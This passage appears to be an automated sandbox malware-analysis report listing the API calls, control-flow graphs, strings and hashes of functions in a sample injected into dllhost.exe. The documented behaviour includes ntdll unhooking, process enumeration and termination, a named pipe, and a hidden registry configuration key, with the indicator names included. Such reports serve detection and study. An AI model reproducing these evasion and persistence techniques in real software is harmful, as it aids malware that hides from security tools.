                                                                                                                        • Part of subcall function 00401DD3: VirtualProtect.KERNEL32(?,32F4B90A,?,?), ref: 00401F29
                                                                                                                        • Part of subcall function 00401DD3: CloseHandle.KERNEL32(00000000), ref: 00401F3B
                                                                                                                        • Part of subcall function 00401DD3: FreeLibrary.KERNEL32(00000000), ref: 00401F43
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004020F4
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004020F7
                                                                                                                      • Sleep.KERNELBASE(00000064), ref: 004020FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess$CloseHeapResource$ConditionCurrentFileMask$FindFreeHandleModuleProtectThreadVirtual$AllocChangeExecuteInfoInformationLibraryLoadLockMappingNotificationShellSizeofSleepValueVerifyVersionViewlstrcmpi
                                                                                                                      • String ID: DLL$kernel32.dll$ntdll.dll$open$pid$svc32
                                                                                                                      • API String ID: 2281104129-3373353123
                                                                                                                      • Opcode ID: b056252c1206f71e0372da97cbc3efba45776c38caa2d3a975075073fc614224
                                                                                                                      • Instruction ID: 38f762a91ea52acd9cd0d10831f7bbf6a81aa2782ebd19e713fb52033b0d7939
                                                                                                                      • Opcode Fuzzy Hash: b056252c1206f71e0372da97cbc3efba45776c38caa2d3a975075073fc614224
                                                                                                                      • Instruction Fuzzy Hash: EB413371601204BFE714AF61DD4AE2B7A6DEF44745F10447EB602BA1E1DAB8AD01CB6C
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 96 401dd3-401de1 97 401de7-401df4 call 4019fa 96->97 98 401f4a-401f4c 96->98 101 401df6-401dfb 97->101 102 401dfd 97->102 103 401e02-401e26 StrCpyW StrCatW GetModuleHandleW 101->103 102->103 104 401f49 103->104 105 401e2c-401e4d call 40196a GetCurrentProcess K32GetModuleInformation 103->105 104->98 108 401f42-401f43 FreeLibrary 105->108 109 401e53-401e77 CreateFileW 105->109 108->104 110 401f41 109->110 111 401e7d-401e92 CreateFileMappingW 109->111 110->108 112 401e98-401ea9 MapViewOfFile 111->112 113 401f3a-401f3b CloseHandle 111->113 114 401f31-401f34 FindCloseChangeNotification 112->114 115 401eaf-401ec0 112->115 113->110 114->113 115->114 116 401ec2-401ee4 lstrcmpiA 115->116 117 401ef2-401f2e VirtualProtect call 401941 VirtualProtect 116->117 118 401ee6-401eee 116->118 117->114 118->116 120 401ef0 118->120 120->114
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004019FA: GetCurrentProcess.KERNEL32(?,ntdll.dll,ntdll.dll,?,00401DEC), ref: 00401A08
                                                                                                                        • Part of subcall function 004019FA: IsWow64Process.KERNEL32(00000000,?,00401DEC), ref: 00401A0F
                                                                                                                      • StrCpyW.SHLWAPI ref: 00401E03
                                                                                                                      • StrCatW.SHLWAPI ref: 00401E12
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00401E19
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,0000000C), ref: 00401E3E
                                                                                                                      • K32GetModuleInformation.KERNEL32(00000000), ref: 00401E45
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401E69
                                                                                                                      • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000), ref: 00401E87
                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 00401E9E
                                                                                                                      • lstrcmpiA.KERNEL32(00401F6B,.text), ref: 00401EDC
                                                                                                                      • VirtualProtect.KERNEL32(?,32F4B90A,00000040,?), ref: 00401F0C
                                                                                                                      • VirtualProtect.KERNEL32(?,32F4B90A,?,?), ref: 00401F29
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00401F34
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401F3B
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00401F43
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileProcess$CloseCreateCurrentHandleModuleProtectVirtual$ChangeFindFreeInformationLibraryMappingNotificationViewWow64lstrcmpi
                                                                                                                      • String ID: .text$C:\Windows\SysWOW64\$C:\Windows\System32\$ntdll.dll
                                                                                                                      • API String ID: 3518538039-4096225029
                                                                                                                      • Opcode ID: c30aa5182b79588eaa17673ae1eb34337f6289a1362defd548a5370a50861279
                                                                                                                      • Instruction ID: 0cdc86c9c0c289f199924ec369a22b62943f1a56bb26273ae121f609569670d2
                                                                                                                      • Opcode Fuzzy Hash: c30aa5182b79588eaa17673ae1eb34337f6289a1362defd548a5370a50861279
                                                                                                                      • Instruction Fuzzy Hash: 1341AF71901215ABDB10DFA1DD89EAFBFBCEF48711F104166B905F2290D778DA01CBA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 122 4016fd-40175f GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 123 401765-401770 122->123 124 401879-4018a6 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 122->124 125 401776-401779 123->125 126 401877 123->126 127 40177c-401790 OpenProcess 125->127 126->124 128 401796-4017ab K32EnumProcessModules 127->128 129 40186d-401871 127->129 130 4017b1-4017be 128->130 131 401866-401867 FindCloseChangeNotification 128->131 129->126 129->127 132 401863 130->132 133 4017c4-4017e1 ReadProcessMemory 130->133 131->129 132->131 134 4017e3-4017f2 133->134 135 401806-40180a 133->135 136 4017f4-4017fc 134->136 137 40180e-401816 134->137 135->133 138 40180c 135->138 136->137 139 4017fe-401804 136->139 140 401818-401830 137->140 141 40185f 137->141 138->132 139->135 139->137 142 401840-40184b 140->142 143 401832-40183e 140->143 141->132 144 40184e-40185d 142->144 143->144 144->132
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,74DF2E90,00000000,00000000), ref: 00401720
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040172D
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40), ref: 0040173B
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401742
                                                                                                                      • K32EnumProcesses.KERNEL32(004018DB,00009C40,?), ref: 00401757
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,004018DB), ref: 00401786
                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?), ref: 004017A3
                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000), ref: 004017D9
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401867
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,004018DB), ref: 0040187B
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00401888
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0040188E
                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00401895
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178662837-0
                                                                                                                      • Opcode ID: 06d371d356d1a68a379f45de22ab422bdb666e2b089f0b1cd932ea4aafa399ab
                                                                                                                      • Instruction ID: f944c13f248919bbff2ebf0d05b4004713a15aee8a1618dc714bfd3de059199b
                                                                                                                      • Opcode Fuzzy Hash: 06d371d356d1a68a379f45de22ab422bdb666e2b089f0b1cd932ea4aafa399ab
                                                                                                                      • Instruction Fuzzy Hash: 3A513E71E01219ABDB11DFA5CD84AAFBBB8FF48701F10846AE545B7290D778EB40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 152 4021ed-4021f3 153 4021f4-402203 call 401bc6 152->153 156 402205-40220d Sleep 153->156 157 40220f-40221a ConnectNamedPipe 153->157 156->153 158 402253-402255 Sleep 157->158 159 40221c-402231 ReadFile 157->159 161 40225b-402262 DisconnectNamedPipe 158->161 160 402233-402251 WriteFile 159->160 159->161 160->161 161->157
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401BC6: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEE
                                                                                                                        • Part of subcall function 00401BC6: SetEntriesInAclW.ADVAPI32(00000001,?,00000000,004021FE), ref: 00401C33
                                                                                                                        • Part of subcall function 00401BC6: LocalAlloc.KERNEL32(00000040,00000014), ref: 00401C41
                                                                                                                        • Part of subcall function 00401BC6: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00401C50
                                                                                                                        • Part of subcall function 00401BC6: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,004021FE,00000000), ref: 00401C61
                                                                                                                        • Part of subcall function 00401BC6: CreateNamedPipeW.KERNELBASE(\\.\pipe\$sxrchildproc34226543a32,00000003,00000000,000000FF,00000400,00000400,00000000,?), ref: 00401C8D
                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00402207
                                                                                                                      • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 00402212
                                                                                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00402229
                                                                                                                      • WriteFile.KERNEL32(00000000,0000004D,00000001,?,00000000), ref: 0040224B
                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00402255
                                                                                                                      • DisconnectNamedPipe.KERNEL32(00000000), ref: 0040225C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                      • String ID: M$\\.\pipe\$sxrchildproc34226543a32
                                                                                                                      • API String ID: 2203880229-931012095
                                                                                                                      • Opcode ID: 8bbcbc9c30bf249403b67e5192530c3daad7030c3e3b146d5d97f71634417a3f
                                                                                                                      • Instruction ID: 5dace2141bef9c3b5cd1cb720ea8b1ec6a8901c3fd299cecde42825f938ecfee
                                                                                                                      • Opcode Fuzzy Hash: 8bbcbc9c30bf249403b67e5192530c3daad7030c3e3b146d5d97f71634417a3f
                                                                                                                      • Instruction Fuzzy Hash: A1012C30541114BBE710ABA09E0DFEE7B6CAF04702F0040B6F621F51D5DBB85B4586AA
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 192 401a9b-401ab6 OpenProcessToken 193 401ab8-401acb GetTokenInformation 192->193 194 401b2e-401b32 192->194 195 401b25-401b28 CloseHandle 193->195 196 401acd-401ad6 GetLastError 193->196 195->194 196->195 197 401ad8-401ae7 LocalAlloc 196->197 198 401b24 197->198 199 401ae9-401afe GetTokenInformation 197->199 198->195 200 401b00-401b1b GetSidSubAuthorityCount GetSidSubAuthority 199->200 201 401b1d-401b1e LocalFree 199->201 200->201 201->198
                                                                                                                      APIs
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,?), ref: 00401AAE
                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00401AC3
                                                                                                                      • GetLastError.KERNEL32 ref: 00401ACD
                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,00000000), ref: 00401ADD
                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00401AF6
                                                                                                                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00401B02
                                                                                                                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00401B0F
                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00401B1E
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00401B28
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Token$AuthorityInformationLocal$AllocCloseCountErrorFreeHandleLastOpenProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 134889411-0
                                                                                                                      • Opcode ID: 3f6903201eff1ad7ec3e2dd7b63a750a26bf1666cece8edcd273cf13e87f80dd
                                                                                                                      • Instruction ID: 9164ece030e66e8021fde0b930ee6f0da4f620963b5e28a9a42e3cf50d94b084
                                                                                                                      • Opcode Fuzzy Hash: 3f6903201eff1ad7ec3e2dd7b63a750a26bf1666cece8edcd273cf13e87f80dd
                                                                                                                      • Instruction Fuzzy Hash: 1F11E635A01208FFDB219F65DD08EAE7FBDEB45702B004065F941F6164D7349A05DA64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 212 4018a7-4018dd GetProcessHeap HeapAlloc call 4016fd 215 40192e-401940 GetProcessHeap HeapFree 212->215 216 4018df-4018e5 212->216 217 4018e7-4018ea 216->217 218 40192d 216->218 219 4018ed-4018f6 217->219 218->215 220 401921-401927 219->220 221 4018f8-4018fa 219->221 220->219 223 401929-40192c 220->223 221->220 222 4018fc-40190d OpenProcess 221->222 222->220 224 40190f-40191b TerminateProcess CloseHandle 222->224 223->218 224->220
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,00000000), ref: 004018B8
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004018BF
                                                                                                                        • Part of subcall function 004016FD: GetProcessHeap.KERNEL32(00000000,00009C40,74DF2E90,00000000,00000000), ref: 00401720
                                                                                                                        • Part of subcall function 004016FD: HeapAlloc.KERNEL32(00000000), ref: 0040172D
                                                                                                                        • Part of subcall function 004016FD: GetProcessHeap.KERNEL32(00000000,00009C40), ref: 0040173B
                                                                                                                        • Part of subcall function 004016FD: HeapAlloc.KERNEL32(00000000), ref: 00401742
                                                                                                                        • Part of subcall function 004016FD: K32EnumProcesses.KERNEL32(004018DB,00009C40,?), ref: 00401757
                                                                                                                        • Part of subcall function 004016FD: OpenProcess.KERNEL32(00000410,00000000,004018DB), ref: 00401786
                                                                                                                        • Part of subcall function 004016FD: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?), ref: 004017A3
                                                                                                                        • Part of subcall function 004016FD: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000), ref: 004017D9
                                                                                                                        • Part of subcall function 004016FD: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401867
                                                                                                                        • Part of subcall function 004016FD: GetProcessHeap.KERNEL32(00000000,004018DB), ref: 0040187B
                                                                                                                        • Part of subcall function 004016FD: HeapFree.KERNEL32(00000000), ref: 00401888
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,00000000,74DF2E90,00000000), ref: 00401902
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00401912
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040191B
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401931
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00401938
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeOpen$ChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1088988999-0
                                                                                                                      • Opcode ID: 6b1c4ebb3777feb8a05adef8be37bc18a57d842e180a3acae5b33e55d23f7326
                                                                                                                      • Instruction ID: fb9a27978f6a034ac965e41c8b7e99190f8b99f20516355282bac86f31688869
                                                                                                                      • Opcode Fuzzy Hash: 6b1c4ebb3777feb8a05adef8be37bc18a57d842e180a3acae5b33e55d23f7326
                                                                                                                      • Instruction Fuzzy Hash: 3F112AB1E01304BBDB10AFE59D88B4EBBBCEB08712F108476E505B32E5D7759A44CB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 225 401557-40157f RegCreateKeyExW 226 401581-40159e ConvertStringSecurityDescriptorToSecurityDescriptorW 225->226 227 4015bb 225->227 228 4015a0-4015b0 RegSetKeySecurity LocalFree 226->228 229 4015b6-4015b9 226->229 230 4015bd-4015c0 227->230 228->229 229->230
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyExW.KERNELBASE(80000002,SOFTWARE\$sxrconfig,00000000,00000000,00000000,000F013F,00000000,?,00000000,74DF2E90,00000000,?,?,?,00401FE7), ref: 00401577
                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA),00000001,?,?), ref: 00401596
                                                                                                                      • RegSetKeySecurity.KERNELBASE(?,00000004,?,?,00401FE7), ref: 004015A7
                                                                                                                      • LocalFree.KERNEL32(?,?,00401FE7), ref: 004015B0
                                                                                                                      Strings
                                                                                                                      • SOFTWARE\$sxrconfig, xrefs: 0040156D
                                                                                                                      • D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00401591
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Security$Descriptor$ConvertCreateFreeLocalString
                                                                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE\$sxrconfig
                                                                                                                      • API String ID: 200925960-2289364234
                                                                                                                      • Opcode ID: c692efe74f0057505f4a1857620f9dc869b443ba960f10c4b16b43229a36ce3f
                                                                                                                      • Instruction ID: e221c2813855d26ddeeea765a6059013b2d6337bb14bfc1399376ef4206ac4e7
                                                                                                                      • Opcode Fuzzy Hash: c692efe74f0057505f4a1857620f9dc869b443ba960f10c4b16b43229a36ce3f
                                                                                                                      • Instruction Fuzzy Hash: B7F04F71A01144FAEB208F93DD4DE9BBEBCEBC9B52F10007AB506F51A0D6B19B00D634
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 231 402144-40217c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 232 40217f-402191 K32EnumProcesses 231->232 233 4021e0-4021eb Sleep 232->233 234 402193-4021a0 232->234 233->232 235 4021a2-4021a6 234->235 236 4021cd-4021df call 401941 234->236 237 4021a8 235->237 238 4021bb-4021c1 call 402129 235->238 236->233 240 4021ab-4021b4 237->240 244 4021c4-4021c7 238->244 242 4021b6-4021b9 240->242 243 4021c8-4021cb 240->243 242->238 242->240 243->235 243->236 244->243
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40), ref: 0040215A
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00402163
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40), ref: 00402171
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00402174
                                                                                                                      • K32EnumProcesses.KERNEL32(00000000,00009C40,00000000), ref: 00402189
                                                                                                                      • Sleep.KERNEL32(?), ref: 004021E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3676546796-0
                                                                                                                      • Opcode ID: e5adb8926e7dec3823364b7b493ddd17e58a4642b9b77fd56c7ff8a0fadb3289
                                                                                                                      • Instruction ID: 66d67af688ccf783c9b14762ec8d461ab50095ac80c86e35fe63267406dd6c23
                                                                                                                      • Opcode Fuzzy Hash: e5adb8926e7dec3823364b7b493ddd17e58a4642b9b77fd56c7ff8a0fadb3289
                                                                                                                      • Instruction Fuzzy Hash: 79118435A00208FBEB00DFA5CE89E9EBBB9EF44340F114066E601BB2D1DA74EE01CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 246 401a24-401a38 call 4019fa 249 401a70-401a74 246->249 250 401a3a-401a4b OpenProcess 246->250 251 401a75-401a7b 249->251 250->251 252 401a4d-401a5a IsWow64Process 250->252 253 401a67-401a6e FindCloseChangeNotification 252->253 254 401a5c-401a65 252->254 253->251 254->253
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004019FA: GetCurrentProcess.KERNEL32(?,ntdll.dll,ntdll.dll,?,00401DEC), ref: 00401A08
                                                                                                                        • Part of subcall function 004019FA: IsWow64Process.KERNEL32(00000000,?,00401DEC), ref: 00401A0F
                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,?,?,00000000,?,?,004015E7), ref: 00401A41
                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?,004015E7), ref: 00401A52
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,004015E7), ref: 00401A68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Wow64$ChangeCloseCurrentFindNotificationOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4129136839-0
                                                                                                                      • Opcode ID: a0c2e445314d4d3943c277c77b2de6f04aacceb240dc7e2a74db8b74a1d4ebff
                                                                                                                      • Instruction ID: 9bba9e8d02ee339451b18017cc5224c975329efc84972edc9a767445a5fcdd74
                                                                                                                      • Opcode Fuzzy Hash: a0c2e445314d4d3943c277c77b2de6f04aacceb240dc7e2a74db8b74a1d4ebff
                                                                                                                      • Instruction Fuzzy Hash: 24F0BB31712124BBD7115BB55D44E67BEACDA45FD1304003AF505E31A4DA74CE0196A9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 255 401f4d call 401f5a 257 401f52-401f53 ExitProcess 255->257
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401F5A: FindResourceA.KERNEL32(00000000,00000065,DLL), ref: 00401F8F
                                                                                                                        • Part of subcall function 00401F5A: SizeofResource.KERNEL32(00000000,00000000), ref: 00401FA1
                                                                                                                        • Part of subcall function 00401F5A: LoadResource.KERNEL32(00000000,00000000), ref: 00401FB6
                                                                                                                        • Part of subcall function 00401F5A: LockResource.KERNEL32(00000000), ref: 00401FC5
                                                                                                                        • Part of subcall function 00401F5A: GetCurrentProcessId.KERNEL32 ref: 00401FD6
                                                                                                                        • Part of subcall function 00401F5A: RegCreateKeyExW.KERNELBASE(?,pid,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402001
                                                                                                                        • Part of subcall function 00401F5A: GetCurrentProcessId.KERNEL32 ref: 00402011
                                                                                                                        • Part of subcall function 00401F5A: RegSetValueExW.KERNELBASE(?,svc32,00000000,00000004,?,00000004), ref: 00402027
                                                                                                                        • Part of subcall function 00401F5A: RegCloseKey.KERNELBASE(?), ref: 00402030
                                                                                                                        • Part of subcall function 00401F5A: RegCloseKey.ADVAPI32(?), ref: 00402035
                                                                                                                        • Part of subcall function 00401F5A: CreateThread.KERNELBASE(00000000,00000000,004021ED,0040210E,00000000,00000000), ref: 0040204B
                                                                                                                        • Part of subcall function 00401F5A: GetProcessHeap.KERNEL32(00000000,00000008), ref: 00402056
                                                                                                                        • Part of subcall function 00401F5A: HeapAlloc.KERNEL32(00000000), ref: 00402059
                                                                                                                        • Part of subcall function 00401F5A: CreateThread.KERNELBASE(00000000,00000000,00402144,00000000,00000000,00000000), ref: 00402078
                                                                                                                      • ExitProcess.KERNEL32 ref: 00401F53
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessResource$Create$CloseCurrentHeapThread$AllocExitFindLoadLockSizeofValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 174967751-0
                                                                                                                      • Opcode ID: 737b34eaf55ec59df306f5ceb539ecb8c1703084bb46b4a449e56836c782dc18
                                                                                                                      • Instruction ID: a9820ec4fc1e7acf1a8feda80c12b2f9dfc763f825636f6784c730f50046647e
                                                                                                                      • Opcode Fuzzy Hash: 737b34eaf55ec59df306f5ceb539ecb8c1703084bb46b4a449e56836c782dc18
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,004014CA,00000000,00000000,00000000,00000000,75A8EB20,75A8E9B0), ref: 004011BE
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0000020A,00000000), ref: 004011D3
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004011DA
                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,00000000,?), ref: 00401213
                                                                                                                      • StrCmpIW.SHLWAPI(?,00000000), ref: 0040123E
                                                                                                                      • StrCmpW.SHLWAPI ref: 00401246
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401276
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0040127D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: d73c19a54e81282df246583a50c1a1210eac5d4a094454cc8cdd8a36e7cb4c15
                                                                                                                      • Instruction ID: d640552e9f22904feccb17d456dea9a8e24644a51106c3a71cedb22d8a8be99a
                                                                                                                      • Opcode Fuzzy Hash: d73c19a54e81282df246583a50c1a1210eac5d4a094454cc8cdd8a36e7cb4c15
                                                                                                                      • Instruction Fuzzy Hash: BE215E70A01219AFDB149FA5DD89EBF7BBCEB05746F10407AF502F2290DB749E44CA68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00401546,00000000,00000000,00000000,00000000,75A8EB20,00000000,75A8E9B0), ref: 0040105A
                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,?,?), ref: 0040109A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00402119), ref: 004010D8
